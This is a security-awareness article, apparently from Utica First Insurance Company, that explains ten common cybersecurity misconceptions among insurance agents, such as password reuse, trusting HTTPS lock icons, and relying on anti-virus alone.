Utica First Insurance Company
7 min read
Over the last 5-7 years Cybersecurity has been one of the hottest and most polarizing topics in businesses. Almost every day you can read about the latest data breach to xyz company. Along with this news comes salespeople proclaiming their solution would have prevented that breach. You've probably heard this tune before. With all the drama and news coverage around these data breaches it’s inevitable that there is going to be a lot of misinformation and confusion, even when it comes to what should be very simple topics.
In this article I am going to walk you through 10 common misconceptions that Insurance Agents have about Cybersecurity and articulate what's important to know about each of these topics. Each topic serves as a lesson in both what not to do (or think) and what to do or think. Use these topics as talking points with your staff and help them get an understanding of them too. We are only as strong as our weakest links.
1. We can be 100% secure
Believe it or not there are some that subscribe to the theory that you can be 100% secure. The truth is, you cannot. Even if, in a perfect world, you could lock everything down and be completely certain that you are 100% secure, what do you think that would mean to your business. Think you could still get work done easily and efficiently? Nope. Risk management is at the heart of cybersecurity. Just like you cannot prevent all losses of a business risk, you cannot prevent all losses from cybersecurity risk.
If there is only one universal truth in Cybersecurity, it's that 100% security is a myth and those who try to attain it either fail or go crazy trying. Don't try to be 100% secure, focus on mitigation and resiliency instead.
2. Only big companies get hacked
The 2019 Verizon Data Breach Investigation Report (DBIR) revealed that 43% of breaches Verizon investigated or had data about involved small businesses. Now, you might be saying, "Hmm, that's lower than I thought." Well, stop and think for a minute about all the small businesses that are not reporting that they had an incident or it's just not in the mainstream news. Believe it or not there's way more data breaches than the news can possible cover.
The hard truth is that hackers are chomping at the bit looking for weak targets. Sometimes that means the Targets and Home Depots of the world and sometimes it means Ian the insurance agent or Larry the Lawyer.
3. Who would want to hack me or my agency? We don’t have anything valuable
In the same report, the 2019 Verizon DBIR, Verizon found that financial gain was the leading motive behind 71% of data breaches. Data is now more valuable than oil. Especially data that can be bought and sold. This data is used for identity theft, fraud, scams and more. Criminals go where the money is. Being a financial services company, an insurance agency is ripe full of interesting data for hackers. They are after all sorts of private information such as email addresses, usernames, passwords, driver’s license numbers, social security numbers, credit card numbers and so much more. Not only that, but even personal non-private information is valuable. Why do you think Amazon knows so much about you? That information is harvested and purchased from sources all over the internet.
4. Anti-virus is enough to keep us safe
I use anti-virus to catch the low hanging fruit of malware. Most anti-virus products on the market will catch the random, spray and pray, commodity type malware. This is malware that doesn't change much if at all or has very identifiable patterns of activity. However, when you begin to see more sophisticated malware that uses evasion techniques, that's when your regular ole anti-virus starts to become less effective, if effective at all.
Anti-virus is just another layer of what should be a multi layered approach to cybersecurity. Maybe anti-virus doesn't spot that malicious attachment in your email, however, due to solid detection capabilities you setup you are alerted when strange processes begin to spawn on your computer and you're able to quarantine your computer before the malware spreads.
5. All email and attachments are safe to open, especially those from my contacts
One of the most common ways to get someone to open a malicious email attachment is to send an email from someone they know or someone who they are currently in an email exchange with. This approach works incredibly well for hackers. They are relying on the existing trust you have with that sender and are hoping that trust gets you to open that malicious word document they sent you.
I wouldn't go so far and be so paranoid to say that no emails or attachments are safe even those from your contacts, but, it's fairly close. It's better to be unsure and ask for help from IT or Security than to be unsure and just open it anyways because you don't want to wait, or you don't think someone would want to hack you.
6. All websites are completely safe, especially the ones with the little lock symbol
This is one of those topics that I think is not super obvious what the risks are. More and more websites are now using HTTPS for their website and the actual number of websites that do utilize https has increased exponentially. However, there is usually a misconception that the 's' in HTTPS means safe. Here, there is a big difference between secure and safe.
HTTPS means that the communication from point a to point b is secured. Meaning, the information being exchanged back and forth, for example between your bank’s servers and your browser, is encrypted. HTTPS ensures that the information going back and forth cannot be intercepted by hackers.
One thing I will say, however, is that hackers know that we as humans look for that little lock symbol in our browsers. We have been trained to look for that. So, hackers say, "ok, fine I’ll just send them aa fake website and put that lock icon there." The lock icon means that the website has what's called a certificate. Well, you can get free certificates, or you could host your website using Microsoft Azure and use their certificate for your website.
Then all the hacker has to do is convince you to visit their fake site (that maybe they have made to look like your bank), and they could very easily steal your password and anything else you give them while on the fake website. Since the hacker controls the website and the certificate, he or she can steal anything you send them.
Just because the site says secure and it uses HTTPS doesn't mean it's safe to use.
7. My IT department stops all the bad stuff
As good as we are as IT practitioners and as much as we want to be heroes (and we sure do try) we cannot and will not ever, ever, stop everything. Where there is a will there is a way and the saying is and will always be true also for cybersecurity. With enough time, money, resources, motive, etc. hackers will find a way to breach your defenses. That's not doom and gloom that's just reality.
IT and Security cannot block all the bad stuff from getting to your mailbox or prevent all the bad sites from ever being clicked on in your web browser. You do have to take some responsibility and have situational awareness when you're working. Especially when you're in your email and on websites.
Take care, slow down, pay attention to the warning signs or red flags and you will be better able to spot bad stuff when it comes your way.
8. I can't be easily tricked
While I admire the hubris, we are all humans and humans by nature are very trusting and because of that trust we can be fooled. We can be tricked. We can be conned. I really think that if you believe you can't be tricked, often times you will be one of the first to get tricked. The way you will get tricked is when someone does enough research about you to know that you're a season ticket holder for your local professional baseball team and that you're an uber fan of the first baseman. That first baseman has a hobby selling hard to find Nike sneakers, so naturally you're into it too. Well, since you can find out anything about anyone online, that information could be used against you in the form of a well-crafted phishing email made to look like an amazing deal on super rare Nike sneakers has been found and you must act now to buy them at 75% off the normal price.
When it comes to email, if it sounds too good to be true, it usually is.
9. Using the same password for every site is smart and saves time
Going back to the 2019 Verizon DBIR, Verizon found that 29% of all data breaches involved the use of stolen credentials and a whopping 80% of hacking related breaches involved compromised and weak credentials.
The reason this is happening is because data breach after data breach has revealed hundreds of millions of passwords. Hackers are essentially taking those passwords and trying to break into other accounts using the top 100, 1,000, 10,000 passwords.
Just based purely on math, they are bound to be successful. One compromise could lead to 10 more just based on weak passwords alone.
10. No one can guess my password
That's ok, they don't need to guess it. They will just ask you for it. In the form of a fake login page or a suspicious phone call form 'IT'. Or they will just use one of the 500+ million passwords that are now floating around online. Guessing passwords is now really only coming into play when someone has been able to break into your network and downloads your entire user directory.
Making your passwords unique across all over your accounts and enable multifactor authentication are really the best ways to combat this type of attack.
What You Know Someone Else May Not
What seems simple and obvious to you and I might not be so for others. That includes your agency owner or other agents in your office or even customers. I encourage you to share what you know with others. Help others understand what using unique passwords for all your accounts means. If you can't help them direct them, help them find the answer or at least point them in a direction to look.
We're all in this together and the more we all know, the better.